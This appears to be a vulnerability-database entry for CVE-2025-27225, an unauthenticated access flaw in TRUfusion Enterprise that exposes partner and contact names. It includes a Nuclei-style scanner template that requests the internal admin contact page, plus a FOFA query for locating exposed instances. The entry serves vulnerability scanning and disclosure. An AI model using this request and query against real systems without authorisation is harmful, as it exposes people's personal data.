CVE-2025-27225: TRUfusion Enterprise <= 7.10.4.0 - Admin Contact Portal

2025-08-01 TRUfusion Enterprise PoC Public

Description

TRUfusion Enterprise versions 7.10.4.0 and earlier contained a vulnerability that allowed unauthenticated access to the Internal Admin Contact Page, resulting in the disclosure of PII (including partner and contact names).

PoC

id: CVE-2025-27225

info:
  name: TRUfusion Enterprise <= 7.10.4.0 - Admin Contact Portal
  author: DhiyaneshDK,rcesecurity
  severity: high
  description: |
    TRUfusion Enterprise versions 7.10.4.0 and earlier contained a vulnerability that allowed unauthenticated access to the Internal Admin Contact Page, resulting in the disclosure of PII (including partner and contact names).
  impact: |
    Unauthenticated attackers can access the Internal Admin Contact Page, exposing personally identifiable information including partner and contact names without any authorization.
  remediation: |
    Upgrade TRUfusion Enterprise to a secure version by updating to one of the following releases: 7.10.3.1, 7.10.1.1, 7.10.1.0, 7.10.3.0, 7.9.6.1, 7.9.6.0, 7.9.5.0, 7.9.4.0, 7.9.3.1, 7.9.3.0, 7.9.2.1, 7.10.2.0, or 7.10.0.1.
  reference:
    - https://github.com/MrTuxracer/advisories/blob/master/CVEs/CVE-2025-27225.txt
    - https://www.rcesecurity.com/2025/09/when-audits-fail-four-critical-pre-auth-vulnerabilities-in-trufusion-enterprise/
    - https://docs.rocketsoftware.com/bundle/trufusion_rn_71031/page/kwg1743156415157.html
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
    cvss-score: 7.5
    cve-id: CVE-2025-27225
    epss-score: 0.17222
    epss-percentile: 0.97013
    cwe-id: CWE-288
  metadata:
    verified: true
    max-request: 1
    fofa-query: body="TRUfusion"
  tags: cve,cve2025,trufusion,auth-bypass,vuln

http:
  - method: GET
    path:
      - "{{BaseURL}}/trufusionPortal/jsp/internal_admin_contact_login.jsp"

    matchers:
      - type: dsl
        dsl:
          - 'contains_all(body, "Partner : ", "page.logout()", "trufusionPortal")'
          - 'contains(content_type, "text/html")'
          - 'status_code == 200'
        condition: and
# digest: 4b0a00483046022100d9868fa24be138bd9b405871d16714ca6cc2d063483b23290d84b9a084005308022100caf7323f7f98932de2bd3063898ff0f2405b41f8427dc737c433584bfdd89e0c:922c64590222798bb761d5b6d8e72950

# Visit https://trap.biu.life/ to view exploit trends for this vulnerability.

References

Related Vulnerabilities